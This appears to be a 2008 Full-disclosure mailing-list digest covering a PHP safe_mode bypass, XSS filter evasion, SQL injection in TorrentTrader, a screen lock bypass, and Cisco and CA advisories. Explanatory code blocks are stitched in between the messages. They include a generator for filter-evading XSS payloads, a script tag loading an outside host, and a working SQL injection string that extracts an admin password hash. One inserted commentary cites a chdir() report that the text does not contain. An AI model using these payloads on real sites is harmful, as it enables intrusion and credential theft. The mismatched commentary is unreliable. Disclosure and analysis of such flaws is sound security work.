CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

posix_access - Determine accessibility of a file

SYNOPSIS:
bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH THE http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS.

--- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's look at the posix_access() function:

---
PHP_FUNCTION(posix_access)
{
	long mode = 0;
	int filename_len, ret;
	char *filename, *path;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) {
		RETURN_FALSE;
	}

	path = expand_filepath(filename, NULL TSRMLS_CC);
	if (!path) {
		POSIX_G(last_error) = EIO;
		RETURN_FALSE;
	}

	if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
			(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
		efree(path);
		POSIX_G(last_error) = EPERM;
		RETURN_FALSE;
	}

	ret = access(path, mode);
	efree(path);

	if (ret) {
		POSIX_G(last_error) = errno;
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

var_dump(posix_access("http://../../../etc/passwd")) == True
var_dump(posix_access("/etc/passwd")) == False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); turns "http://../../../etc/passwd" into path=/etc/passwd, but the safe_mode test

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))

is run on the raw argument "http://../../../etc/passwd". php_checkuid_ex() skips anything that starts with http://, so safe_mode is bypassed, and access() is then called on the expanded /etc/passwd. Note that the open_basedir test in the same condition is applied to the expanded path, which is why open_basedir is not affected by this trick while safe_mode is.

--- 2. How to Fix ---
Do not rely on safe_mode as your main security boundary.

--- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0
n4Sg31DePRpr4h3PLouKFoA=
=6qwD
-----END PGP SIGNATURE-----
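As an added illustration (not part of either SecurityReason advisory and not PHP's own code), the following Python model reproduces the check-versus-use mismatch behind both the chdir() and the posix_access() reports: the safe_mode uid check is run on the raw argument, which it waves through because the argument looks like a URL, while the filesystem call is made on the expanded path. The owner table, the script uid of 80, the working directory /www and the "looks like a URL" rule are assumptions modelled on the advisories' examples.

```python
import posixpath

# Constructed model of the filesystem in the advisories' examples: path -> owner uid.
OWNERS = {
    "/": 0,
    "/etc": 0,
    "/etc/passwd": 0,
    "/www": 80,
    "/www/wufff.php": 80,
    "/www/http:": 80,      # the directory created for EXAMPLE2 of the chdir() report
}
SCRIPT_UID = 80            # "The script whose uid is 80 ..."
CWD = "/www"


def expand_filepath(filename, cwd=CWD):
    """Model of PHP's expand_filepath(): a name without a leading '/' is joined onto
    the working directory and '..' segments collapse. "http://../../../etc/passwd" is
    relative, so 'http:' is just a directory name and the '..' segments climb out."""
    if not filename.startswith("/"):
        filename = posixpath.join(cwd, filename)
    return posixpath.normpath(filename)


def php_checkuid_model(path):
    """Model of the safe_mode uid check; True means access is allowed.
    Assumption taken from the advisory text: anything that looks like a URL is
    accepted without being resolved, which is the flaw being modelled."""
    if "://" in path:
        return True
    owner = OWNERS.get(path)
    if owner is None:
        # CHECKUID_CHECK_FILE_AND_DIR: fall back to the containing directory
        owner = OWNERS.get(posixpath.dirname(path))
    return owner == SCRIPT_UID


def posix_access_vulnerable(filename):
    """The PHP 5.2.6 shape: check the raw argument, then use the expanded path."""
    path = expand_filepath(filename)
    if not php_checkuid_model(filename):
        return False
    return path in OWNERS          # stands in for access(path, mode) succeeding


def posix_access_fixed(filename):
    """Check the same string you are about to use: the expanded path."""
    path = expand_filepath(filename)
    if not php_checkuid_model(path):
        return False
    return path in OWNERS


if __name__ == "__main__":
    for name in ("/etc/passwd", "http://../../../etc/passwd", "/www/wufff.php"):
        print("%-30s vulnerable=%-5s fixed=%s" % (
            name, posix_access_vulnerable(name), posix_access_fixed(name)))
```

The same expand-then-check ordering is what makes the chdir() example work: expand_filepath("http://../../etc/") from /www yields /etc, and only the raw string ever reaches the uid check.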
Re: [Full-disclosure] xss dot(.) filter evasion
Hello,

So, with (String) { eval(fromCharCode( /* insert charcodes here */ )) } is what I needed.

Regards,
Thomas Pollet

2008/6/18 Thomas Pollet <[EMAIL PROTECTED]>:
> Hello,
>
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?
>
> function write(str){
>     // document.write() doesn't work as it becomes document_write()
>     var s = /write/;
>     var w = String();   // cast to string so we can index
>     var n = String();
>     w += s;             // w is now "/write/"
>     n += w[1] + w[2] + w[3] + w[4] + w[5];   // "write"
>     // call document['write']
>     document[n](str);
> }
> var s = /fromCharCode/;
> var w = String();
> var n = String();
> w += s;                 // w is now "/fromCharCode/"
> n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
>      w[11] + w[12];     // "fromCharCode"
>
> // <a href="http://whatever.com"/>h</a>
> write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
> 62,104,60,47,97,62));
>
> /*
> // <script src="http://h.com">
> write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
> ,111,109,34,62));
> */
>
> Regards,
> Thomas Pollet
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
Hi,

> There are actually studies going on RIGHT NOW to see if phones can be
> allowed to be used during flights by the FCC/FAA, and in other countries as
> well.

Several European carriers now allow mobiles to be used in flight.

- I'm bothered more by the person inanely chatting during the flight than by security issues
- hopefully the hold luggage has been properly scanned anyway
- or a dumb timer would do just as well as a mobile.

PS: lots of people don't turn their phones off. Lots of people talk on their phones before going through customs etc.

alan
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Wed, Jun 18, 2008 at 12:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.

Do you make money from saying his name? You use it in enough of your emails.

Joel - ignore him.
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Jun 18, 2008, at 12:26 PM, n3td3v wrote:

> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.

First of all, I said "before I got the iPhone with the 'airplane' mode" I'd forget to turn off my phone a lot; I'd throw it in my briefcase when I'd go through security and forget it's in there. Heck, I've seen people actually be able to receive calls on their crackberries while in mid flight. Not that they answered them. But I've seen the phones ring.

I have an iPhone now; I place it in airplane mode when I get on a flight.

There are actually studies going on RIGHT NOW to see if phones can be allowed to be used during flights by the FCC/FAA, and in other countries as well. Personally I hope this doesn't go through, as I don't want to be sitting next to some dude during my 100,000+ miles I fly a year hearing him yacking the whole flight.

> Is this some kind of dry American humour that I'm missing here or is
> that not even funny?

Yes, it was a joke. Sorry if it was in bad taste.

--
Joel Esler
[EMAIL PROTECTED]
http://blog.joelesler.net
[m]
[Full-disclosure] Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service

Advisory ID: cisco-sa-20080618-ips
Revision 1.0
For Public Release 2008 June 18 1600 UTC (GMT)

Summary
=======

Cisco Intrusion Prevention System (IPS) platforms that have gigabit network interfaces installed and are deployed in inline mode contain a denial of service vulnerability in the handling of jumbo Ethernet frames. This vulnerability may lead to a kernel panic that requires a power cycle to recover platform operation. Platforms deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable.

Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080618-ips.shtml.

Affected Products
=================

Vulnerable Products
+------------------

The following Cisco IPS versions are affected:

  * Cisco Intrusion Prevention System version 5.x prior to 5.1(8)E2
  * Cisco Intrusion Prevention System version 6.x prior to 6.0(5)E2

The following Cisco IPS platforms ship with gigabit network interfaces and are vulnerable if they are deployed in inline mode:

  * 4235
  * 4240
  * 4250
  * 4250SX *
  * 4250TX
  * 4250XL *
  * 4255
  * 4260
  * 4270

* The 4250SX and 4250XL models ship with gigabit network interfaces that are normally used for remote administration and monitoring. If the gigabit network interfaces are configured for use with inline mode, the platform is vulnerable.

To determine the version of software that is running on a Cisco IPS platform, log into the platform using the console or Secure Shell (SSH) and issue the show version command.

    sensor# show version
    Application Partition:
    Cisco Intrusion Prevention System, Version 6.0(4a)E1

To determine whether a Cisco IPS platform has interfaces configured for inline mode, log into the platform using the console or SSH and issue the show interfaces command.
Look for paired interfaces in the Inline Mode statement of the command output.

    sensor# show interfaces
    ...
    MAC statistics from interface GigabitEthernet0/1
       Interface function = Sensing interface
       Description =
       Media Type = TX
       Missed Packet Percentage = 0
       Inline Mode = Paired with interface GigabitEthernet0/0
    ...
    MAC statistics from interface GigabitEthernet0/0
       Interface function = Sensing interface
       Description =
       Media Type = TX
       Missed Packet Percentage = 0
       Inline Mode = Paired with interface GigabitEthernet0/1

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco IPS platforms are not vulnerable:

  * 4210
  * 4215
  * SSM-AIP10
  * SSM-AIP20
  * SSM-AIP40
  * AIM-IPS
  * NM-CIDS
  * IDSM2

Cisco IPS version 6.1(1) is not vulnerable.

Cisco IOS with the Intrusion Prevention System feature is not vulnerable.

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

Certain Cisco IPS platforms contain a denial of service vulnerability in the handling of jumbo Ethernet frames. When a specific series of jumbo Ethernet frames is received on a gigabit network interface of a vulnerable Cisco IPS platform that is deployed in inline mode, a kernel panic may occur that results in the complete failure of the platform and causes a network denial of service condition. Cisco IPS platforms that are deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable.

Jumbo Ethernet support is usually deployed in data center environments to increase inter-server communication performance and is not a default configuration for Cisco routers and switches. Support for jumbo Ethernet frames must be enabled on each device that requires the feature.

In order to exploit this vulnerability, an attacker must be able to inject jumbo Ethernet frames to a vulnerable Cisco IPS platform that is deployed in inline mode.
Even if they are configured to use bypass mode to allow traffic to pass in the event of a system failure, all affected Cisco IPS platforms will stop forwarding traffic after the kernel panic, with the exception of the 4260 and 4270 platforms. The Cisco IPS 4260 and 4270 platforms contain a hardware bypass feature that allows them to pass network traffic in the event of a kernel panic or power outage. They will pass traffic by default if the hardware bypass feature is engaged.

This vulnerability is documented in Cisco Bug ID CSCso64762 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-2060.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this
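The advisory's "am I affected" procedure combines three facts: the release shown by show version, whether the platform ships gigabit sensing interfaces, and whether any gigabit pair is in inline mode in show interfaces. The following Python script is an added example (not Cisco's tooling) that applies those three tests to captured command output; the sample output is constructed in the shape of the advisory's own excerpts, and the version ordering rule (a lettered build such as 4a sorts between 4 and 5) is an assumption.

```python
import re

# Fixed releases from the advisory: 5.x before 5.1(8)E2 and 6.x before 6.0(5)E2.
FIXED = {5: (5, 1, 8, 0, 2), 6: (6, 0, 5, 0, 2)}

# Platforms the advisory lists as shipping gigabit network interfaces.
GIGABIT_PLATFORMS = {"4235", "4240", "4250", "4250SX", "4250TX",
                     "4250XL", "4255", "4260", "4270"}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\((\d+)([a-z]?)\)(?:E(\d+))?$")


def parse_version(s):
    """'6.0(4a)E1' -> (6, 0, 4, 1, 1), a tuple that compares in release order.
    Assumption: a letter after the build number sorts after the bare build (4 < 4a < 5)."""
    m = _VERSION_RE.match(s.strip())
    if not m:
        raise ValueError("unrecognised IPS version: %r" % s)
    major, minor, build, letter, engine = m.groups()
    return (int(major), int(minor), int(build),
            ord(letter) - ord("a") + 1 if letter else 0,
            int(engine) if engine else 0)


def version_vulnerable(s):
    """True for the 5.x and 6.x ranges the advisory names; 6.1(1) and later are not."""
    v = parse_version(s)
    fixed = FIXED.get(v[0])
    return fixed is not None and v < fixed


def version_from_show_version(text):
    m = re.search(r"Cisco Intrusion Prevention System, Version (\S+)", text)
    return m.group(1) if m else None


def inline_gigabit_interfaces(show_interfaces):
    """(interface, partner) pairs for GigabitEthernet sensing interfaces whose
    'Inline Mode' line says they are paired. Assumption: any other Inline Mode
    text means the interface is not inline."""
    found = []
    blocks = re.split(r"(?m)^MAC statistics from interface ", show_interfaces)
    for block in blocks[1:]:
        name = block.split(None, 1)[0]
        m = re.search(r"Inline Mode = Paired with interface (\S+)", block)
        if name.startswith("GigabitEthernet") and m:
            found.append((name, m.group(1)))
    return found


def assess(platform, show_version, show_interfaces):
    """True only when all three of the advisory's conditions hold."""
    version = version_from_show_version(show_version)
    if version is None:
        raise ValueError("no version line found in show version output")
    return (version_vulnerable(version)
            and platform in GIGABIT_PLATFORMS
            and bool(inline_gigabit_interfaces(show_interfaces)))


# Constructed sample output, shaped like the advisory's excerpts.
SAMPLE_SHOW_VERSION = """Application Partition:
Cisco Intrusion Prevention System, Version 6.0(4a)E1
"""

SAMPLE_SHOW_INTERFACES = """MAC statistics from interface GigabitEthernet0/1
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/0
MAC statistics from interface GigabitEthernet0/0
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/1
"""

if __name__ == "__main__":
    print("4260 vulnerable:", assess("4260", SAMPLE_SHOW_VERSION, SAMPLE_SHOW_INTERFACES))
    print("4215 vulnerable:", assess("4215", SAMPLE_SHOW_VERSION, SAMPLE_SHOW_INTERFACES))
```

Because the check requires an inline gigabit pair, it also covers the 4250SX/4250XL footnote: those platforms are only flagged when their gigabit interfaces have actually been paired.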
[Full-disclosure] Joel Esler comment on Sans ISC podcast
Joel Esler said he doesn't switch his phone off on flights and that anyone who is on a plane with him should watch out.

Is this some kind of dry American humour that I'm missing here or is that not even funny?

I'm asking the TSA to listen to his comments made in audio format and decide if this individual should be banned from flying.

http://isc.sans.org/diary.html?storyid=4568

All the best,
n3td3v
[Full-disclosure] xss dot(.) filter evasion
Hello,

I came across this site that implemented some filtering so the dots were replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to the page using String.fromCharCode)
Someone knows a different way to do this?

function write(str){
    // document.write() doesn't work as it becomes document_write()
    var s = /write/;
    var w = String();   // cast to string so we can index
    var n = String();
    w += s;             // w is now "/write/"
    n += w[1] + w[2] + w[3] + w[4] + w[5];   // "write"
    // call document['write']
    document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;                 // w is now "/fromCharCode/"
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
     w[11] + w[12];     // "fromCharCode"

// <a href="http://whatever.com"/>h</a>
write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));

/*
// <script src="http://h.com">
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/

Regards,
Thomas Pollet
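The two messages in this thread describe two ways of calling document.write without a dot or a quote ever appearing in the injected text: spelling property names out of a stringified regex literal, and the shorter with(String){eval(fromCharCode(...))}. The following JavaScript is an added example, not from either message, that generates both payload shapes for arbitrary HTML and checks them against a simulated filter and a stub document so the technique can be exercised offline in Node. The filter (dots to underscores, quotes and backslashes backslash-escaped), the sample HTML and the stub document are constructed assumptions modelled on the description above.

```javascript
// Characters the site's filter rewrites or escapes, per the thread: . " ' \
const FORBIDDEN = /[."'\\]/;

// Encode a string as comma-separated char codes; digits and commas pass any such filter.
function toCharCodes(s) {
  return Array.from(s, (ch) => ch.charCodeAt(0)).join(',');
}

// Original post's trick: "" + /name/ gives the string "/name/", so w[1]..w[name.length]
// spells the property name without writing a quote or a dot.
function regexNameExpr(name) {
  const parts = [];
  for (let i = 1; i <= name.length; i++) parts.push(`w[${i}]`);
  return `(function(){var w=String();w+=/${name}/;return ${parts.join('+')}})()`;
}

// document.write(String.fromCharCode(...)) as document[...](String[...](...)).
function payloadViaIndexing(html) {
  return `document[${regexNameExpr('write')}](String[${regexNameExpr('fromCharCode')}](${toCharCodes(html)}))`;
}

// Follow-up's trick: with(String) puts fromCharCode in scope, and eval runs the decoded
// text as code, so the decoded source itself may freely contain dots and quotes.
function payloadViaWith(js) {
  return `with(String){eval(fromCharCode(${toCharCodes(js)}))}`;
}

// Simulated site filter (constructed): dots become underscores, quotes/backslashes are escaped.
function siteFilter(s) {
  return s.replace(/\./g, '_').replace(/(["'\\])/g, '\\$1');
}

// Execute a payload against a stub document that records what gets written.
// new Function bodies are sloppy-mode, so the with statement is allowed.
function runWithStubDocument(payload) {
  const written = [];
  const doc = { write: (s) => written.push(s) };
  new Function('document', payload)(doc);
  return written.join('');
}

function demo() {
  const html = '<a href="http://example.com/">h</a>';                 // constructed sample
  const p1 = payloadViaIndexing(html);
  const p2 = payloadViaWith(`document.write(${JSON.stringify(html)})`);
  return {
    p1Clean: !FORBIDDEN.test(p1) && siteFilter(p1) === p1,   // survives the filter unchanged
    p2Clean: !FORBIDDEN.test(p2) && siteFilter(p2) === p2,
    out1: runWithStubDocument(siteFilter(p1)),
    out2: runWithStubDocument(siteFilter(p2)),
  };
}
```

The with/eval variant is the more general of the two: every byte of the real payload travels as a number, so the filter only ever sees digits, commas and the fixed with(String){eval(fromCharCode())} wrapper. A filter that rewrites dots but still lets arbitrary JavaScript execute is therefore not a defence; the fix is output encoding of the context the data lands in, not blacklisting characters.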
[Full-disclosure] Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities
======================================================================

                     Secunia Research 18/06/2008

        - TorrentTrader Multiple SQL Injection Vulnerabilities -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* TorrentTrader 1.08 Classic Edition downloaded before 2008-06-17

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: Exposure of sensitive information
        Manipulation of data
Where:  Remote

======================================================================
3) Vendor's Description of Software

"TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring intergrated forums, and plenty of administration options."

Product Link:
http://www.torrenttrader.org/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in TorrentTrader, which can be exploited by malicious people and malicious users to conduct SQL injection attacks.

1) Input passed to the "email" and "wantusername" parameters in account-signup.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation of this vulnerability allows e.g. retrieval of administrator password hashes, but requires that "magic_quotes_gpc" is disabled and that the site is not configured as invite-only.

2) Input passed to the "receiver" parameter in account-inbox.php (when "msg" is set) is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation of this vulnerability requires valid user credentials and that "magic_quotes_gpc" is disabled.

======================================================================
5) Solution

Update to TorrentTrader 1.08 Classic Edition downloaded on 2008-06-17 or later.

======================================================================
6) Time Table

10/06/2008: Contacted the vendor.
17/06/2008: Contacted the vendor again.
17/06/2008: Vendor asks for PoC.
17/06/2008: Sent PoC to the vendor.
17/06/2008: Vendor releases a fixed version.
18/06/2008: Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2428 for the vulnerabilities.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:
http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.
http://secunia.com/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:
http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:
http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-15/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
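The advisory names the bug class (unsanitised request parameters reaching SQL text) and the consequence (administrator password hashes can be read), but not TorrentTrader's query. The following Python is an added example, not the tracker's code, that models the signup path the advisory describes with an in-memory SQLite table standing in for MySQL: the vulnerable version pastes the "email" value into an INSERT, so a single quote ends the literal and a subquery copies the administrator's hash into the attacker's own row, where the attacker can then read it from their profile. The parameterised version stores the same input harmlessly. The INSERT shape, the table layout and the sample hash are assumptions; the advisory's note that exploitation needs magic_quotes_gpc disabled corresponds to the quote in the payload arriving unescaped.

```python
import sqlite3

ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed sample value


def make_db():
    """In-memory stand-in for the tracker's users table (constructed, not TorrentTrader's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "email TEXT, passhash TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO users (username, email, passhash, is_admin) "
               "VALUES ('admin', 'admin@example.invalid', ?, 1)", (ADMIN_HASH,))
    return db


def signup_vulnerable(db, wantusername, email, passhash):
    """The advisory's bug class: request parameters pasted into the SQL text.
    With magic_quotes_gpc off, a quote in 'email' ends the literal and the rest is SQL."""
    sql = ("INSERT INTO users (username, email, passhash, is_admin) "
           "VALUES ('%s', '%s', '%s', 0)" % (wantusername, email, passhash))
    db.execute(sql)
    db.commit()


def signup_fixed(db, wantusername, email, passhash):
    """Parameterised statement: values travel separately from the SQL, so the same
    input is stored as an odd-looking but inert e-mail address."""
    db.execute("INSERT INTO users (username, email, passhash, is_admin) VALUES (?, ?, ?, 0)",
               (wantusername, email, passhash))
    db.commit()


def profile(db, username):
    """What a signed-up user can see about their own account."""
    row = db.execute("SELECT email, passhash FROM users WHERE username = ?",
                     (username,)).fetchone()
    return {"email": row[0], "passhash": row[1]} if row else None


# Attacker-controlled 'email' field: closes the literal, substitutes a subquery for the
# password-hash column, and comments out the remainder of the original statement.
INJECTED_EMAIL = ("mallory@example.invalid', "
                  "(SELECT passhash FROM users WHERE is_admin = 1), 0) -- ")


def demo():
    """Returns (vulnerable profile, fixed profile) for the same signup request."""
    vuln = make_db()
    signup_vulnerable(vuln, "mallory", INJECTED_EMAIL, "ownhash")
    fixed = make_db()
    signup_fixed(fixed, "mallory", INJECTED_EMAIL, "ownhash")
    return profile(vuln, "mallory"), profile(fixed, "mallory")


if __name__ == "__main__":
    vulnerable, safe = demo()
    print("vulnerable signup stored:", vulnerable)
    print("parameterised signup stored:", safe)
```

Escaping input (what magic_quotes_gpc did) only blocks this particular payload; the fix the vendor shipped is the right one, keeping data out of the SQL text entirely.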
[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored
These protocol-handler security settings are ignored although they're set to 'true', and no warnings are shown:

  network.protocol-handler.warn-external.mailto
  network.protocol-handler.warn-external.news
  network.protocol-handler.warn-external.nntp
  network.protocol-handler.warn-external.snews

(in about:config)

For example, I set network.protocol-handler.warn-external.mailto to 'true', clicked on an e-mail link and Windows Mail is launched without any warnings (tested on Firefox 3.0 on Windows Vista SP1).
[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)
Well, I improved the advisory I released a while ago after I found several websites which claim that this is a fake/myth security problem because they were not able to reproduce it on their boxes...

The updated version is available at milw0rm (thanks to str0ke) and I recommend that all who mirrored the article do update.

milw0rm link: http://www.milw0rm.com/exploits/4028

I even included a little example to make it fool proof...

I was really impressed that some do think it's a fake/myth and claim that on their website. So it would be nice if the guys at osvdb.org (and others) would update their articles, rating and whatever else matters for them to correct their statements. I have now named an OS and how to reproduce it. So feel free to install oBSD in a VM. ;]

The new version of the "improved" advisory is attached too for your convenience. The bug itself is still the old one.

Kind regards,
Rembrandt

Helith - 0815

Author: Rembrandt
Date: Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS: OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass
Greets go to: Helith and all affiliated/loyal people

I did not find an advisory related to this so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers to gain system access in case screen was locked with a password. It has been tested on OpenBSD + screen 4.0.3 on x86/amd64. But due to the nature of the behavior of screen and OpenBSD it should be architecture/version independent for now.

How to check this?

Lock screen using ctrl+x
Choose a password
Confirm the password
Screen asks for a password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
        29602.ttyC0.raven       (Attached)
        25144.ttyC1.raven       (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you won't be able to lock your shell. screen will never ask you for a password.

Of course this also works if you get access to an SSH session which has a locked screen running. So in case you have locked your screen session which contains an open SSH session to a host where you also have a locked screen session, you might have no password protection at all in case all systems are OpenBSD. That is just another example.

Important for you should be the combination of screen and OpenBSD. Do not claim it does not work because you just tested this against the latest Linux/Solaris/Whatever. It is known to work and I mentioned the OS. Still, it is known that it worked against some scary Linux distributions which are not really common.

All security websites which report this as a fake may consider updating their reports instead of simply claiming wrong things.

Have fun!

Kind regards,
Rembrandt
[Full-disclosure] The Extended HTML Form attack revisited
Hi -

Back in 2002 I published details of a vulnerability affecting most web browsers. It detailed a security flaw that allows attackers to abuse non-HTTP protocols to launch Cross Site Scripting attacks even when a target web application was not vulnerable to XSS. Six years later I'm releasing an update to this research in this paper.

This security vulnerability still affects popular web browsers today, and the following browsers were tested as vulnerable:

  * Internet Explorer 6
  * Internet Explorer 7
  * Internet Explorer 8 (beta 1)
  * Opera 9.27
  * Opera 9.50
  * Safari 1.32
  * Safari 3.1.1

Others have described how to abuse this behavior for purposes other than Cross Site Scripting. NGSSoftware previously published a paper called "Inter-Protocol Exploitation" which references the original EyeonSecurity paper.

Paper at:
http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf
or
http://tinyurl.com/5d88ll

--
Sandro Gauci
EnableSecurity
Web: http://enablesecurity.com/
[Full-disclosure] CA ARCserve Backup Discovery Service Denial of Service Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability

CA Advisory Date: 2008-06-17

Reported By: Luigi Auriemma

Impact: A remote attacker can cause a denial of service.

Summary: CA ARCserve Backup contains a vulnerability in the Discovery service (casdscsvc) that can allow a remote attacker to cause a denial of service condition. CA has issued patches to address the vulnerability. The vulnerability, CVE-2008-1979, occurs due to insufficient verification of client data. An attacker can make a request that can crash the service.

Mitigating Factors: None

Severity: CA has given this vulnerability a Medium risk rating.

Affected Products:
CA ARCserve Backup r12.0 Windows
CA ARCserve Backup r11.5 Windows SP3 and prior*
CA ARCserve Backup r11.1 Windows*
CA ARCserve Backup r11.1 Netware*
CA Server Protection Suite r2
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2

*Formerly known as BrightStor ARCserve Backup

Non-affected Products:
CA ARCserve Backup r11.5 Windows SP4

Affected Platforms: Windows and Netware

Status and Recommendation:
CA has issued the following patches to address the vulnerabilities.

CA ARCserve Backup r12.0 Windows: QO99574
CA ARCserve Backup r11.5 Windows: QO99575
For CA ARCserve Backup r11.5 Windows, the issue can also be addressed by applying 11.5 SP4: QO99129
CA ARCserve Backup r11.1 Windows: QO99576
CA ARCserve Backup r11.1 Netware: QO99579
CA Protection Suites r2: QO99575

How to determine if you are affected:

CA ARCserve Backup r12.0 Windows:
1. Run the ARCserve Patch Management utility. From the Windows Start menu, it can be found under Programs->CA->ARCserve Patch Management->Patch Status.
2. The main patch status screen will indicate if patch "QO99574" is currently applied. If the patch is not applied, the installation is vulnerable.
For more information on the ARCserve Patch Management utility, read document TEC446265.

Alternatively, use the file information below to determine if the product installation is vulnerable.

